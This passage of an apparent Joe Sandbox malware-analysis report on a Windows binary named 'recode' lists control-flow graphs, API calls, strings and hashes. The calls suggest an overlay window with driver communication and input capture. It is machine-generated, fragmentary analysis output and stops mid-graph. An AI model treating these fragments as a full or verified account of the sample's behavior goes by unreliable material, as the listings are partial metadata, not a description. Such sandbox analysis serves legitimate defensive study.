                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo_noreturn$ControlDevice$powf$ByteCharMultiWide$memmovesqrtfstrstrtanf$__stdio_common_vsnprintf_smemsetsqrt
                            • String ID: 2$a[P_TNR8a[P_TNR8Building Plan
                            • API String ID: 64780426-3080726919
                            • Opcode ID: 1be9a8f5bf4958f7c314df4ece612cf94c27755f7b7e74caac6b2090473556bb
                            • Instruction ID: 57647b818d38382be4f252be4a0500c7c59295227ec66ad6b59d3a9288c89243
                            • Opcode Fuzzy Hash: 1be9a8f5bf4958f7c314df4ece612cf94c27755f7b7e74caac6b2090473556bb
                            • Instruction Fuzzy Hash: 8F83FC62D19BC58AE722DF35D8412F9E320FF55388F889332EA4D265E5DF38A189C714

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 760 7ff75805fc84-7ff75805fcc4 761 7ff75805fcd9-7ff75805fce2 760->761 762 7ff75805fcc6-7ff75805fccd 760->762 764 7ff75805fcfe-7ff75805fd00 761->764 765 7ff75805fce4-7ff75805fce7 761->765 762->761 763 7ff75805fccf-7ff75805fcd4 762->763 766 7ff75805ff62-7ff75805ff88 call 7ff75805e020 763->766 768 7ff75805fd06-7ff75805fd0a 764->768 769 7ff75805ff60 764->769 765->764 767 7ff75805fce9-7ff75805fcf1 765->767 771 7ff75805fcf7-7ff75805fcfa 767->771 772 7ff75805fcf3-7ff75805fcf5 767->772 773 7ff75805fd10-7ff75805fd13 768->773 774 7ff75805fde1-7ff75805fe08 call 7ff75805ffac 768->774 769->766 771->764 772->764 772->771 777 7ff75805fd27-7ff75805fd39 GetFileAttributesExW 773->777 778 7ff75805fd15-7ff75805fd1d 773->778 785 7ff75805fe2a-7ff75805fe33 774->785 786 7ff75805fe0a-7ff75805fe13 774->786 779 7ff75805fd8c-7ff75805fd9b 777->779 780 7ff75805fd3b-7ff75805fd44 GetLastError 777->780 778->777 782 7ff75805fd1f-7ff75805fd21 778->782 784 7ff75805fd9f-7ff75805fda1 779->784 780->766 783 7ff75805fd4a-7ff75805fd5c FindFirstFileW 780->783 782->774 782->777 789 7ff75805fd5e-7ff75805fd64 GetLastError 783->789 790 7ff75805fd69-7ff75805fd8a FindClose 783->790 791 7ff75805fdad-7ff75805fddb 784->791 792 7ff75805fda3-7ff75805fdab 784->792 787 7ff75805feeb-7ff75805fef4 785->787 788 7ff75805fe39-7ff75805fe51 GetFileInformationByHandleEx 785->788 793 7ff75805fe23-7ff75805fe25 786->793 794 7ff75805fe15-7ff75805fe1d CloseHandle 786->794 798 7ff75805ff49-7ff75805ff4b 787->798 799 7ff75805fef6-7ff75805ff0a GetFileInformationByHandleEx 787->799 795 7ff75805fe7c-7ff75805fe95 788->795 796 7ff75805fe53-7ff75805fe5f GetLastError 788->796 789->766 790->784 791->769 791->774 792->774 792->791 793->766 794->793 797 7ff75805ff9c-7ff75805ffa2 abort 794->797 795->787 806 7ff75805fe97-7ff75805fe9b 795->806 802 7ff75805fe75-7ff75805fe77 796->802 803 7ff75805fe61-7ff75805fe6c CloseHandle 796->803 807 7ff75805ffa3-7ff75805ffa8 797->807 804 7ff75805ff4d-7ff75805ff51 798->804 805 7ff75805ff89-7ff75805ff8d 798->805 800 7ff75805ff0c-7ff75805ff18 GetLastError 799->800 801 7ff75805ff36-7ff75805ff46 799->801 800->802 808 7ff75805ff1e-7ff75805ff29 CloseHandle 800->808 801->798 802->766 803->802 809 7ff75805fe6e-7ff75805fe74 abort 803->809 804->769 810 7ff75805ff53-7ff75805ff5e CloseHandle 804->810 805->807 813 7ff75805ff8f-7ff75805ff9a CloseHandle 805->813 811 7ff75805fe9d-7ff75805feb7 GetFileInformationByHandleEx 806->811 812 7ff75805fee4 806->812 807->766 808->802 814 7ff75805ff2f-7ff75805ff35 abort 808->814 809->802 810->769 810->797 815 7ff75805fedb-7ff75805fee2 811->815 816 7ff75805feb9-7ff75805fec5 GetLastError 811->816 817 7ff75805fee8 812->817 813->797 813->807 814->801 815->817 816->802 818 7ff75805fec7-7ff75805fed2 CloseHandle 816->818 817->787 818->802 819 7ff75805fed4-7ff75805feda abort 818->819 819->815
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                            • String ID:
                            • API String ID: 4293554670-0
                            • Opcode ID: d3de40aef3f753d4d6f96bb09c596f524a2afca1fe43b75ce632c9c1829ac108
                            • Instruction ID: b959f1c49e4d48ecac6c7b18c551b1ebe935e3cd8a30e851a4f6f0bd5b7a0c32
                            • Opcode Fuzzy Hash: d3de40aef3f753d4d6f96bb09c596f524a2afca1fe43b75ce632c9c1829ac108
                            • Instruction Fuzzy Hash: 6E91B231B08A4247E674AB25A814279E391AF46BB4F9C0334DABE47AD5DF3CE44D8734

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 820 7ff758053150-7ff7580531a5 call 7ff758045e50 823 7ff7580531ab-7ff7580531b9 call 7ff758045b50 820->823 824 7ff758053495-7ff7580534bb call 7ff75805e020 820->824 829 7ff7580531bb-7ff7580531de call 7ff7580030e0 823->829 830 7ff7580531e3-7ff758053224 call 7ff75805e738 call 7ff758045e50 823->830 836 7ff758053492 829->836 830->824 838 7ff75805322a-7ff75805322d 830->838 836->824 839 7ff7580532b9-7ff7580532ca 838->839 840 7ff758053233-7ff758053239 838->840 842 7ff7580532d0-7ff7580532d3 839->842 841 7ff758053240-7ff7580532b7 DeviceIoControl 840->841 841->839 841->841 843 7ff7580532eb-7ff758053305 842->843 844 7ff7580532d5-7ff7580532e9 842->844 845 7ff75805331c-7ff75805336c call 7ff758045600 call 7ff75805df08 843->845 846 7ff758053307 843->846 844->842 852 7ff75805336e-7ff758053371 845->852 853 7ff758053376-7ff758053389 845->853 847 7ff758053310-7ff75805331a 846->847 847->845 847->847 854 7ff758053454-7ff758053458 852->854 855 7ff7580534bc-7ff7580534c1 call 7ff7580014c0 853->855 856 7ff75805338f-7ff758053392 853->856 854->836 860 7ff75805345a-7ff75805346c 854->860 870 7ff7580534c2-7ff758053572 call 7ff758001420 855->870 858 7ff758053394-7ff75805339e 856->858 859 7ff75805340f-7ff758053416 856->859 864 7ff7580533cc-7ff7580533df 858->864 865 7ff7580533a0-7ff7580533ad 858->865 861 7ff75805341b-7ff758053424 859->861 862 7ff758053418 859->862 866 7ff75805346e-7ff758053481 860->866 867 7ff75805348a-7ff75805348d call 7ff75805df08 860->867 868 7ff758053443-7ff758053450 861->868 869 7ff758053426 861->869 862->861 872 7ff758053408-7ff75805340b 864->872 873 7ff7580533e1-7ff7580533e8 864->873 871 7ff7580533b1-7ff7580533bc call 7ff75805e490 865->871 866->867 874 7ff758053483-7ff758053489 _invalid_parameter_noinfo_noreturn 866->874 867->836 868->854 876 7ff758053430-7ff758053441 869->876 886 7ff758053578-7ff75805368f 870->886 887 7ff758053695-7ff75805369d 870->887 888 7ff7580533be-7ff7580533ca 871->888 889 7ff7580533f9-7ff7580533ff _invalid_parameter_noinfo_noreturn 871->889 872->859 879 7ff7580533ea-7ff7580533f1 873->879 880 7ff758053400-7ff758053405 call 7ff75805e490 873->880 874->867 876->868 876->876 879->870 884 7ff7580533f7 879->884 880->872 884->871 886->887 890 7ff7580536a0-7ff7580536ce 887->890 888->872 889->880 890->890 891 7ff7580536d0-7ff7580536ee 890->891 892 7ff7580536f4-7ff7580536fa 891->892 893 7ff7580538c0-7ff7580538da FindWindowA 891->893 896 7ff758053885-7ff75805388d 892->896 897 7ff758053700-7ff75805387f 892->897 894 7ff758053a94-7ff758053ad9 GetSystemMetrics * 2 SetWindowPos 893->894 895 7ff7580538e0-7ff758053927 893->895 901 7ff758053b88 894->901 902 7ff758053adf-7ff758053afc 894->902 899 7ff75805392d-7ff75805395c 895->899 900 7ff758053a44-7ff758053a4f 895->900 898 7ff758053890-7ff7580538be 896->898 897->896 898->893 898->898 904 7ff758053960-7ff758053a39 899->904 905 7ff758053a50-7ff758053a7a 900->905 903 7ff758053b8a-7ff758053bbe call 7ff75805e020 901->903 902->901 911 7ff758053b02-7ff758053b32 GetWindowLongA SetWindowLongA 902->911 904->904 907 7ff758053a3f-7ff758053a42 904->907 905->905 908 7ff758053a7c-7ff758053a8e MessageBoxA 905->908 907->900 907->908 908->894 911->901 912 7ff758053b34-7ff758053b54 DwmExtendFrameIntoClientArea 911->912 912->901 913 7ff758053b56-7ff758053b86 ShowWindow UpdateWindow ShowWindow 912->913 913->903
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: Window$ControlDevice$LongMetricsShowSystem__std_exception_copy$AreaClientConcurrency::cancel_current_taskExtendFindFrameIntoMessageUpdateXlength_error@std@@memmove
                            • String ID: @$BOT$KVZE=
                            • API String ID: 2149274906-3306102780
                            • Opcode ID: cd6fd8ee60721c15787a6e884bcf1f9180167603eeee4192da737eee64c89307
                            • Instruction ID: 8c54971c434a73e45b35fb9b3453cde6c5f5322260da5e988ae31247d5779fe7
                            • Opcode Fuzzy Hash: cd6fd8ee60721c15787a6e884bcf1f9180167603eeee4192da737eee64c89307
                            • Instruction Fuzzy Hash: 0642FD26E1978247F702DB35A4011A9E760AFA7784F85D336EA5C32AD1EF3DF1858314

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: AddressPerformanceProcQuery$CounterFrequencyLibraryLoad
                            • String ID: XInputGetCapabilities$XInputGetState$imgui_impl_win32$xinput1_1.dll$xinput1_2.dll$xinput1_3.dll$xinput1_4.dll$xinput9_1_0.dll
                            • API String ID: 925518172-3912092517
                            • Opcode ID: a5f2324166db4ad94d3658be54c81155c90817acadb36eba787ca9086cf32000
                            • Instruction ID: d3b832619d57cb21be3736cff38158bdc45ee5ecc260f7044f84c8ef88e2c311
                            • Opcode Fuzzy Hash: a5f2324166db4ad94d3658be54c81155c90817acadb36eba787ca9086cf32000
                            • Instruction Fuzzy Hash: 0C418431B18B81D7E750AB11F940269F3A4FB48790F885135DA8D43B95EF3CE0A9C318
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 6fedbc78968b30b7f1f03fb1f3ac9b2b1c419955e7baa5e051dbe15001b4c7f8
                            • Instruction ID: 9efd00229ea24a41cc99911a3f6a1d0dd83f8d3ed4152e0e0e133890081ce8f5
                            • Opcode Fuzzy Hash: 6fedbc78968b30b7f1f03fb1f3ac9b2b1c419955e7baa5e051dbe15001b4c7f8
                            • Instruction Fuzzy Hash: A8C21032A14A908BE754DF36C44076DB7A0FB48B88F488236EE4E63795DF39E894C714

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1241 7ff758031d00-7ff758031d35 call 7ff75800d8c0 call 7ff75800d480 1246 7ff758031d37-7ff758031d43 call 7ff75800d8c0 1241->1246 1247 7ff758031d45 1241->1247 1248 7ff758031d48-7ff758031dcb GetClientRect QueryPerformanceCounter call 7ff75800d480 1246->1248 1247->1248 1253 7ff758031dd9-7ff758031ded call 7ff75800d8c0 GetForegroundWindow 1248->1253 1254 7ff758031dcd-7ff758031dd2 call 7ff75800d8c0 1248->1254 1259 7ff758031e7e-7ff758031e8f call 7ff75800f8a0 1253->1259 1260 7ff758031df3-7ff758031dfa 1253->1260 1254->1253 1269 7ff758031e91-7ff758031ea1 GetKeyState 1259->1269 1270 7ff758031ed5-7ff758031ee1 call 7ff75800f8a0 1259->1270 1262 7ff758031e3d-7ff758031e41 1260->1262 1263 7ff758031dfc-7ff758031e24 ClientToScreen 1260->1263 1262->1259 1264 7ff758031e43-7ff758031e50 GetCursorPos 1262->1264 1266 7ff758031e26-7ff758031e2e SetCursorPos 1263->1266 1267 7ff758031e34-7ff758031e3b 1263->1267 1264->1259 1268 7ff758031e52-7ff758031e62 ScreenToClient 1264->1268 1266->1267 1267->1259 1267->1262 1268->1259 1271 7ff758031e64-7ff758031e79 call 7ff758005c00 1268->1271 1269->1270 1272 7ff758031ea3-7ff758031ed0 call 7ff75800d8c0 call 7ff758005bd0 call 7ff75801a120 1269->1272 1277 7ff758031f27-7ff758031f33 call 7ff75800f8a0 1270->1277 1278 7ff758031ee3-7ff758031ef3 GetKeyState 1270->1278 1271->1259 1272->1270 1287 7ff758031f79-7ff758031f85 call 7ff75800f8a0 1277->1287 1288 7ff758031f35-7ff758031f45 GetKeyState 1277->1288 1278->1277 1280 7ff758031ef5-7ff758031f22 call 7ff75800d8c0 call 7ff758005bd0 call 7ff75801a120 1278->1280 1280->1277 1296 7ff758031f87-7ff758031f97 GetKeyState 1287->1296 1297 7ff758031fcb-7ff758031fcf 1287->1297 1288->1287 1292 7ff758031f47-7ff758031f74 call 7ff75800d8c0 call 7ff758005bd0 call 7ff75801a120 1288->1292 1292->1287 1296->1297 1300 7ff758031f99-7ff758031fc6 call 7ff75800d8c0 call 7ff758005bd0 call 7ff75801a120 1296->1300 1301 7ff758031fd8-7ff758031fdb 1297->1301 1302 7ff758031fd1-7ff758031fd6 call 7ff75800db50 1297->1302 1300->1297 1305 7ff758031fdd-7ff758031fe0 call 7ff758032580 1301->1305 1306 7ff758031fe5-7ff75803200e call 7ff758032080 call 7ff75805e020 1301->1306 1302->1301 1305->1306
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: State$Client$CursorScreen$CounterForegroundPerformanceQueryRectWindow
                            • String ID:
                            • API String ID: 1576454153-0
                            • Opcode ID: f1d52d753b281553c96644c21e4a79c876e43cdde508353dfa369c6c4b04dc14
                            • Instruction ID: a4f825fd028a4ae7c9c525b4c928606148eb55f8964e9fc68a91fa066db5b8e9
                            • Opcode Fuzzy Hash: f1d52d753b281553c96644c21e4a79c876e43cdde508353dfa369c6c4b04dc14
                            • Instruction Fuzzy Hash: 0981D831B18646C7FB10BB22E50527AE3A0EF96780F984235FA5D176D6DF3CE4498724

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1320 7ff758030610-7ff758030641 call 7ff75800d480 1323 7ff758030651 1320->1323 1324 7ff758030643-7ff75803064f call 7ff75800d8c0 1320->1324 1326 7ff758030654-7ff75803067f 1323->1326 1324->1326 1328 7ff758030738 1326->1328 1329 7ff758030685-7ff758030689 1326->1329 1330 7ff75803073a-7ff75803077d call 7ff75805e020 1328->1330 1331 7ff75803068b call 7ff758030d00 1329->1331 1332 7ff758030690-7ff75803069e 1329->1332 1331->1332 1335 7ff7580306a1-7ff7580306a8 1332->1335 1335->1335 1337 7ff7580306aa-7ff7580306ed D3DCompile 1335->1337 1337->1328 1338 7ff7580306ef-7ff758030730 1337->1338 1342 7ff75803077e-7ff75803085b 1338->1342 1343 7ff758030732 1338->1343 1344 7ff758030735 1342->1344 1348 7ff758030861-7ff75803089c 1342->1348 1343->1344 1344->1328 1351 7ff7580308a0-7ff7580308a7 1348->1351 1351->1351 1352 7ff7580308a9-7ff7580308e8 D3DCompile 1351->1352 1352->1328 1353 7ff7580308ee-7ff758030932 1352->1353 1353->1344 1357 7ff758030938-7ff758030a3f memset call 7ff75800d8c0 call 7ff75800d480 1353->1357 1366 7ff758030a41-7ff758030a4d call 7ff75800d8c0 1357->1366 1367 7ff758030a4f 1357->1367 1369 7ff758030a52-7ff758030b8e call 7ff758024d80 1366->1369 1367->1369 1369->1330
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: Compile$memset
                            • String ID: COLOR$POSITION$TEXCOORD$main$ps_4_0$vs_4_0
                            • API String ID: 2361541216-4144671839
                            • Opcode ID: 475f4bddbf19612056318e6adf46c3d499f771148be866804debef9f16401b6d
                            • Instruction ID: 58dad7db15c1654923b4cec0a53007db95e1135309fb2acfc6e4b9e465e1c82c
                            • Opcode Fuzzy Hash: 475f4bddbf19612056318e6adf46c3d499f771148be866804debef9f16401b6d
                            • Instruction Fuzzy Hash: A5F12572A04BC58AEB20DF65E8447DDB7A4F788B88F558126DB8C17B68DF39D148CB10

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: ClipboardGlobal$ByteCharMultiWide$AllocCloseDataEmptyFreeLockOpenUnlock
                            • String ID:
                            • API String ID: 1965520120-0
                            • Opcode ID: d151eeb8ca27365c128fa0ca0dc056ef502974bb9b1aad2b6739fa6ade5804a2
                            • Instruction ID: dbda0a0ac75706d7e5964d71ab67ea47a27ccd65f478487b296a3cd01990f0f9
                            • Opcode Fuzzy Hash: d151eeb8ca27365c128fa0ca0dc056ef502974bb9b1aad2b6739fa6ade5804a2
                            • Instruction Fuzzy Hash: E7116021B09A8283EB14BB26BC04225E3A1FF89BE1F8C4135DA5E477E5DF3CD4488314

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1476 7ff758047400-7ff758047539 call 7ff75801fbe0 __stdio_common_vsnprintf_s MultiByteToWideChar call 7ff75805e738 memset MultiByteToWideChar 1481 7ff758047540-7ff758047548 1476->1481 1481->1481 1482 7ff75804754a-7ff7580475ef call 7ff758045600 call 7ff75805df08 WideCharToMultiByte call 7ff75805e738 memset WideCharToMultiByte 1481->1482 1489 7ff7580475f0-7ff7580475f8 1482->1489 1489->1489 1490 7ff7580475fa-7ff75804761b call 7ff7580030e0 call 7ff75805df08 1489->1490 1495 7ff758047657-7ff758047675 1490->1495 1496 7ff75804761d-7ff758047634 1490->1496 1497 7ff758047677-7ff7580476cd call 7ff7580090f0 1495->1497 1498 7ff7580476d2-7ff7580476dd 1495->1498 1499 7ff758047652 call 7ff75805df08 1496->1499 1500 7ff758047636-7ff758047649 1496->1500 1497->1498 1502 7ff7580478c5-7ff758047948 call 7ff75800d220 call 7ff75800a140 call 7ff75800d4d0 call 7ff758023e20 1498->1502 1503 7ff7580476e3-7ff7580478c0 call 7ff75800d220 call 7ff75800a140 call 7ff75800d4d0 call 7ff758023e20 call 7ff75800d220 call 7ff75800a140 call 7ff75800d4d0 call 7ff758023e20 call 7ff75800d220 call 7ff75800a140 call 7ff75800d4d0 call 7ff758023e20 call 7ff75800d220 call 7ff75800a140 call 7ff75800d4d0 call 7ff758023e20 1498->1503 1499->1495 1500->1499 1504 7ff75804764b-7ff758047651 _invalid_parameter_noinfo_noreturn 1500->1504 1523 7ff75804794a-7ff75804795b 1502->1523 1524 7ff75804797e-7ff7580479bf call 7ff75805e020 1502->1524 1503->1502 1504->1499 1527 7ff758047979 call 7ff75805df08 1523->1527 1528 7ff75804795d-7ff758047970 1523->1528 1527->1524 1528->1527 1530 7ff758047972-7ff758047978 _invalid_parameter_noinfo_noreturn 1528->1530 1530->1527
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemset$__stdio_common_vsnprintf_s
                            • String ID:
                            • API String ID: 2975225152-0
                            • Opcode ID: 3f7c384454ac157e8457c195c7135281c91ed420ef36237ab2b4967f218a5f18
                            • Instruction ID: 493ffb985076750a768e771867d7ce108d63f0f7998e16f937b8c31ac6c6954d
                            • Opcode Fuzzy Hash: 3f7c384454ac157e8457c195c7135281c91ed420ef36237ab2b4967f218a5f18
                            • Instruction Fuzzy Hash: C3F19322E18B8486F300EB75E8411ADF3A1FB99798F545335EE8D27AA9DF38D185C704

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1750 7ff758035470-7ff758035492 1751 7ff7580354a8 1750->1751 1752 7ff758035494-7ff7580354a7 1750->1752 1753 7ff7580354aa-7ff7580354ad 1751->1753 1754 7ff7580354bd-7ff7580354c0 1751->1754 1755 7ff7580354af-7ff7580354b2 1753->1755 1756 7ff7580354b4-7ff7580354bb 1753->1756 1757 7ff7580354c7-7ff7580354ca 1754->1757 1758 7ff7580354c2-7ff7580354c5 1754->1758 1759 7ff7580354ce-7ff7580354d6 1755->1759 1756->1759 1757->1759 1758->1759 1760 7ff7580354dc-7ff758035516 1759->1760 1761 7ff758035873-7ff7580358a1 1759->1761 1762 7ff758035518-7ff75803551d 1760->1762 1763 7ff75803551f-7ff758035533 1760->1763 1764 7ff758035538-7ff758035550 1762->1764 1763->1764 1765 7ff758035559-7ff75803556d 1764->1765 1766 7ff758035552-7ff758035557 1764->1766 1767 7ff758035571-7ff758035588 1765->1767 1766->1767 1768 7ff75803558a-7ff75803558d 1767->1768 1769 7ff7580355a0-7ff7580355a7 1767->1769 1770 7ff75803558f-7ff758035592 1768->1770 1771 7ff758035594 1768->1771 1772 7ff7580355a9-7ff7580355ae 1769->1772 1773 7ff7580355b0-7ff7580355c4 1769->1773 1774 7ff758035597-7ff75803559b 1770->1774 1771->1774 1775 7ff7580355c9-7ff7580355cf 1772->1775 1773->1775 1774->1769 1776 7ff7580355d8-7ff7580355ec 1775->1776 1777 7ff7580355d1-7ff7580355d6 1775->1777 1778 7ff7580355f0-7ff7580355fc 1776->1778 1777->1778 1779 7ff7580355fe-7ff758035601 1778->1779 1780 7ff75803560f-7ff758035612 1778->1780 1783 7ff758035606-7ff75803560a 1779->1783 1784 7ff758035603 1779->1784 1781 7ff758035626-7ff758035629 1780->1781 1782 7ff758035614 1780->1782 1786 7ff75803563b-7ff758035641 1781->1786 1787 7ff75803562b 1781->1787 1782->1781 1785 7ff758035616-7ff758035619 1782->1785 1783->1780 1784->1783 1785->1781 1788 7ff75803561b-7ff758035624 1785->1788 1790 7ff75803564a-7ff75803565b 1786->1790 1791 7ff758035643-7ff758035648 1786->1791 1787->1786 1789 7ff75803562d-7ff758035630 1787->1789 1788->1786 1789->1786 1792 7ff758035632-7ff758035636 1789->1792 1793 7ff75803565f-7ff758035673 1790->1793 1791->1793 1792->1786 1794 7ff758035679-7ff75803567e 1793->1794 1795 7ff75803580f-7ff758035837 1793->1795 1798 7ff758035689-7ff758035693 1794->1798 1799 7ff758035680-7ff758035684 1794->1799 1796 7ff758035859-7ff758035872 1795->1796 1797 7ff758035839-7ff758035858 1795->1797 1800 7ff75803569c-7ff7580356ae 1798->1800 1801 7ff758035695-7ff75803569a 1798->1801 1799->1795 1802 7ff7580356b2-7ff7580356b5 1800->1802 1801->1802 1803 7ff7580356bb-7ff7580356df 1802->1803 1804 7ff75803579c-7ff75803579f 1802->1804 1805 7ff7580356e8-7ff7580356fa 1803->1805 1806 7ff7580356e1-7ff7580356e6 1803->1806 1807 7ff7580357ce-7ff75803580b log * 2 1804->1807 1808 